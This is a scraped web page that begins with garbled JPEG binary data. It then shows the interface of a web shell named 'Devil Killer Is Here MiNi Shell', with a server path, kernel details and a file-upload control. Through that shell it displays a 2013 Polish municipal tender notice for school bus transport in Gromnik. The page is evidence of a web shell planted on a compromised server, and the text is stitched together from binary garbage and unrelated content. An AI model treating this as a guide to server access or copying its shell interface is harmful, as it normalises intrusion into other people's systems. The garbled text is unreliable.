JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130611/107379-N-2013.html

<p class="kh_header"><b>Gromnik: Świadczenie usług transportowych w zakresie przewozów szkolnych uczniów na terenie Gminy Gromnik w roku szkolnym 2013/2014</b><br>
<b>Numer ogłoszenia: 107379 - 2013; data zamieszczenia: 11.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , ul.  Witosa 2, 33-180 Gromnik, woj. małopolskie, tel. 014 6514202, 6514238, faks 014 6514095.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gromnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług transportowych w zakresie przewozów szkolnych uczniów na terenie Gminy Gromnik w roku szkolnym 2013/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa polegająca na przewozie szkolnym uczniów (dowóz i odwóz) z terenu Gminy Gromnik w okresie od 02.09.2013r. do 27.06.2014r. (10 miesięcy), oraz sprawowanie opieki nad uczniami podczas przewozu. 
2.Dzierżawa dwóch autobusów szkolnych celem przewozu uczniów.  
Szczegółowe warunki dotyczące zamówienia:
1.W ramach przewozu szkolnego Wykonawca zapewnia dowóz uczniów do ZS w Gromniku oraz ZS w Siemiechowie i odwóz uczniów z powyższych placówek oświatowych do przystanków zlokalizowanych na następujących trasach dowozu: 
- do Zespołu Szkół w Gromniku
PRZYWOZY Trasa I:  Brzozowa - Gromnik (przybliżona odległość - 8 km, przybliżona ilość przystanków - 5, szacunkowa liczba dzieci - 25),  Trasa II: Polichty - Gromnik Góry - Gromnik (przybliżona odległość - 7 km, przybliżona ilość przystanków - 4, szacunkowa liczba dzieci - 35), Trasa III: Rzepiennik Marciszewski - Golanka - Gromnik (przybliżona odległość - 5 km, przybliżona ilość przystanków - 4, szacunkowa liczba dzieci - 25), ODWOZY Trasa I:  Gromnik - Brzozowa (przybliżona odległość - 8 km, przybliżona ilość przystanków - 5, szacunkowa liczba dzieci - 25),  Trasa II: Gromnik - Gromnik Góry - Polichty (przybliżona odległość - 7 km, przybliżona ilość przystanków - 4, szacunkowa liczba dzieci - 35), Trasa III: Gromnik - Golanka - Rzepiennik Marciszewski (przybliżona odległość - 5 km, przybliżona ilość przystanków - 4, szacunkowa liczba dzieci - 25),
- do Zespołu Szkół w Siemiechowie 
PRZYWOZY Siemiechów (Remiza OSP, Ośrodek Zdrowia, droga na Wróblowice, Siemiechów Góry) przybliżona odległość - 13 km, przybliżona ilość przystanków - 7, szacunkowa liczba dzieci - 15,
ODWOZY Siemiechów (Remiza OSP, Ośrodek Zdrowia, droga na Wróblowice, Siemiechów Góry) przybliżona odległość - 13 km, przybliżona ilość przystanków - 7, szacunkowa liczba dzieci - 15,
Szacunkowa liczba uczniów: 100.
Łączna dzienna długość tras przewozów szkolnych ok: 66 km. 
Uwaga!
W powyższym kilometrażu jest uwzględniony tylko dowóz i odwóz, a nie uwzględniono dojazdu Wykonawcy do przystanków początkowych oraz odjazdu z przystanków końcowych tras, które zapewnia we własnym zakresie Wykonawca. 
Zamawiający zastrzega sobie prawo do zmiany liczy przewożonych uczniów bez ponoszenia dodatkowych kosztów z tego tytułu. 
2.Przewozy uczniów dotyczą dni w których odbywają się zajęcia lekcyjne, wyłączając dni wolne od nauki, przerwy świąteczne, czas trwania ferii zimowych obowiązujących w województwie małopolskim oraz okres wakacji letnich. W przypadku odpracowywania zajęć szkolnych w innym dniu wolnym od zajęć, Wykonawca zobowiązany jest zapewnić przewóz dzieci zgodnie z rozkładem jazdy ustalonym przez Dyrektorów poszczególnych Szkół. 
3.Przewóz uczniów odbywać się będzie według harmonogramów ustalonych pomiędzy Wykonawcą a Dyrektorami poszczególnych Szkół i będą mogły ulegać zmianie w związku z organizacją pracy Szkół z siedmiodniowym wyprzedzeniem. 
4.Powyższe harmonogramy zawierać będą szczegółowe ustalenia dotyczące liczby uczniów, tras, przedziałów czasowych i przystanków w jakich powinien być wykonany dowóz uczniów do szkoły oraz ich odwóz po zakończeniu zajęć lekcyjnych. 
5.Realizując zamówienie Wykonawca musi dysponować 4 pojazdami (autobusami) o liczbie miejsc wynikającej z zestawienia liczby przewożonych uczniów. W ramach niniejszego zamówienia Zamawiający wydzierżawia 2 autobusy szkolne będące własnością Gminy Gromnik, które otrzyma w dzierżawę z dniem podpisania umowy na przewozy szkolne oraz w razie potrzeby, pojazdy własne. Wykonawcy ubiegający się o zamówienie mogą zapoznać się ze stanem technicznym autobusów Zamawiającego po wcześniejszym uzgodnieniu z Zamawiającym. Reasumując, Wykonawca winien wykazać, że dysponuje dodatkowo 2 pojazdami (autobusami) spełniającymi wymagania zawarte w niniejszej SIWZ, o liczbie miejsc wynikającej z zestawienia liczby przewożonych uczniów.
6.W przypadku awarii pojazdu przewożącego uczniów, Wykonawca zobowiązany jest na własny koszt zapewnić transport zastępczy w ciągu 1 godz., spełniający wszelkie wymogi określone przez Zamawiającego przy udzieleniu zamówienia. O powyższym fakcie muszą być powiadomieni i wyrazić zgodę Dyrektorzy poszczególnych Szkół. 
7.W przypadku braku zabezpieczenia  pojazdu zastępczego Zamawiający wynajmie pojazd we własnym zakresie a kosztami obciąży Wykonawcę (z należnego wynagrodzenia) oraz nałoży karę w wysokości określonej w umowie.
8.Wykonawca nie może powierzyć wykonania usługi wynikającej z niniejszej umowy innej osobie bez pisemnej zgody Zamawiającego.
9.W razie zaprzestania świadczenia usług lub nieprzystąpienia przez Wykonawcę do świadczenia usług przewozowych w umownym terminie Zamawiający będzie uprawniony do powierzenia wykonania usług przewozu uczniów innemu wykonawcy. Wykonawca zobowiązuje się do zapłaty całości kosztów związanych z wykonaniem przewozów zastępczych.
10.Opiekę nad uczniami oraz ich bezpieczeństwo w czasie przewozów organizuje i zapewnia Wykonawca.
11.Autobusy muszą posiadać wystarczającą liczbę miejsc na określonej trasie - uczniowie muszą mieć zagwarantowane miejsca siedzące. 
12.Wykonawca zobowiązany jest do przestrzegania wszystkich wymogów prawnych dotyczących  przewozów dzieci szkolnych, zapewnienia im właściwej opieki oraz odpowiednich warunków bezpieczeństwa i higieny. 
13.Przewóz uczniów ma się odbywać ubezpieczonymi autobusami posiadającymi aktualny przegląd techniczny. Wykonawca ubezpiecza autobusy i pasażerów od wszelkich szkód powstałych podczas przewozu oraz pozostających w związku z przewozem. 
14.Oferent zobowiązany jest sporządzić kalkulację wynagrodzenia za przewóz uczniów z terenu Gminy Gromnik przy następujących założeniach: 
1)Szacunkowa liczba uczniów: 100, 
2)Łączna dzienna długość tras przewozów szkolnych ok: 66 km, 
3)Ilość dni nauki szkolnej w ciągu jednego miesiąca  - 22, 
4)Organizację roku szkolnego należy przyjąć zgodnie z Rozporządzeniem Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002r. (Dz. U. Nr 46 poz. 432 ze zm.):początek roku szkolnego - 02.09.2013r., zimowa przerwa świąteczna trwa od 23 - 31.12.2013r.,ferie zimowe trwają 2 tygodnie od 03 - 16.02.2014r. (czyli luty 2014r. stanowił będzie połowę kosztu przewidzianego dla innych miesięcy),wiosenna przerwa świąteczna rozpoczyna się w czwartek poprzedzający Święta Wielkanocne i kończy się w najbliższy wtorek po Świętach 17 - 22.04.2014r.,koniec roku szkolnego - 27.06.2014r.  
W myśl powyższych danych,  Wykonawca określi cenę za wykonanie przedmiotu zamówienia na załączonym do SIWZ formularzu ofertowym (załącznik nr 1 do SIWZ) według zasad określonych w sposobie wypełnienia tego formularza, tj., miesięczne ryczałtowe wynagrodzenie za świadczenie usług oraz całkowity koszt świadczenia usług za 10 miesięcy. 
Zamawiający dopuszcza możliwość realizacji usługi w formie przewozów biletowanych (autobusami linii regularnych), jak również w ramach przewozów zamkniętych. W przypadku linii regularnych Wykonawca jest zobowiązany przekazać Zamawiającemu, nie później niż w przeddzień rozpoczęcia każdego nowego miesiąca, biletów miesięcznych według list uczniów, dostarczonych Wykonawcy przez Zamawiającego. Jednakże, z tytułu świadczenia usługi wykonawca otrzyma ryczałtowe miesięczne wynagrodzenie za przewóz uczniów na warunkach określonych niniejszą specyfikacją.  
Dzierżawa autobusów
1.Zamawiający przekazuje w dzierżawę, do wykorzystania w niniejszej usłudze, sprawnie technicznie,   dwa autobusy szkolne:
Autosan A0909L.03.S - liczba miejsc 41+1+1, kolor pomarańczowy,
Autosan H9 20  - liczba miejsc 40+12, kolor pomarańczowy,
2.Wykonawca zobowiązuje się do:
- użytkowania przedmiotów dzierżawy zgodnie z ich przeznaczeniem,
- użytkowania przedmiotów dzierżawy zgodnie z wymogami prawidłowej eksploatacji,
-wykonywania na własny koszt wszystkich napraw i konserwacji bez możliwości ubiegania się o zwrot poniesionych nakładów od Wydzierżawiającego,
-zapewnienia odpowiedniego ogumienia w zależności od sezonu oraz dokonania jego wymiany,
-ponoszenia kosztu zakupu paliwa,
-ponoszenia kosztów przeglądów technicznych, 
-zobowiązkowej umowy ubezpieczenia OC oraz umowy NNW,
-nie dokonywania zmian na przedmiocie dzierżawy bez pisemnej zgody Wydzierżawiającego,
-nie udostępniania osobom trzecim przedmiotu dzierżawy do użytkowania, ani podnajmowania przedmiotu dzierżawy bez pisemnej zgody Wydzierżawiającego,
-konserwacji nadwozia i podwozia,
-uzupełnienia oszkleń,
-napraw urządzeń grzewczych,
-naprawy i konserwacji przewodów hydraulicznych i elektrycznych,
-naprawy lub wymiany uszkodzonych siedzeń,
-wymiany ogumienia,
-wymiany olejów i płynów eksploatacyjnych,
-malowania nadwozia lub podwozia w miarę potrzeb dla zabezpieczenia przed wilgocią lub korozją,
-oraz innych napraw wynikających z bieżącej eksploatacji pojazdu,
-ponoszenia kosztów m. in. przeglądów technicznych, ubezpieczenia pojazdu, podatku. 
3.Wykonawca  będzie płacił miesięcznie czynsz dzierżawy dwóch autobusów w miesiącach w których    realizowany jest dowóz uczniów w wysokości 10 000,00 zł netto . 
4.Zamawiający wystawi co miesiąc wybranemu Wykonawcy (Dzierżawcy) fakturę z tytułu dzierżawy autobusów w umownej kwocie.
Wymagania stawiane Wykonawcy:
Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. 
Wymagana jest należyta staranność przy realizacji zobowiązań umowy, 
Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z   ustanowionym przedstawicielem wykonawcy. 
Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia. 
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia. 
W trakcie wykonywania przewozu uczniów Wykonawca zobowiązuje się do przestrzegania
następujących przepisów prawnych:
1)ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz.U. Nr 98, poz.602 ze zmianami),
2)ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz.U. z 2007 r. Nr 125, poz. 874 ze zmianami),
3)Rozporządzenie Ministra Infrastruktury z dnia 31 grudnia 2002r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (DZ. U. z 2003r. Nr 32, poz. 262 z późn. zm.),
4)Rozporządzenie Ministra Infrastruktury z dnia 22 lipca 2002r. w sprawie rejestracji i oznaczania pojazdów (DZ. U. z 2007r. Nr 186, poz. 1322 z późn. zm.), 
5)innych, aktualnie obowiązujących przepisów prawnych dotyczących wykonywania przewozu osób środkami samochodowymi (autobusami),
6)doraźnych zarządzeń, poleceń i uwag dotyczących organizacji przewozu uczniów, wydawanych przez Dyrektorów poszczególnych Szkół.
UWAGA:
Zaleca się dokonanie wizji lokalnej poszczególnych tras celem oszacowania na własną odpowiedzialność kosztów i ryzyka wykonania zamówienia oraz uzyskanie wszelkich danych jakie mogą być niezbędne do rzetelnego przygotowania oferty..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek ten został spełniony jeżeli Wykonawca wykaże, że posiada aktualną koncesje, zezwolenie lub licencje na wykonywanie krajowego transportu drogowego osób.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych  a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę polegającą na przewozie szkolnym uczniów przez minimum jeden rok szkolny, z podaniem ich wartości , przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane z załączeniem dowodów, że usługi zostały wykonane lub są wykonywane należycie - Załącznik nr 3.
Dowodami o których mowa powyżej są poświadczenia, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem składania ofert lub oświadczenie wykonawcy jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia. W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług (Wykonawca winien wykazać, że dysponuje dodatkowo 2 pojazdami (autobusami) spełniającymi wymagania zawarte w SIWZ, o liczbie miejsc wynikającej z zestawienia liczby przewożonych uczniów.
wraz z informacją o podstawie dysponowania tymi zasobami; Potencjał techniczny - Załącznik nr 5 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - Załącznik nr  4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i  finansowej zapewniającej wykonanie zamówienia należy przedłożyć opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (do oferty należy dołączyć potwierdzenie wpłaty).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a.Oferta na wykonanie zamówienia wg wzoru określonego w Załączniku nr 1, , b.Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów. c.Pełnomocnictwo dla pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego lub ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Jeżeli Wykonawca wykazując spełnienie warunków o których mowa powyżej, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp., Zamawiający w celu oceny czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda załączenia do oferty dokumentów dotyczących: a)zakresu dostępnych Wykonawcy zasobów innego podmiotu, b)sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę przy wykonaniu zamówienia, c)charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d)zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
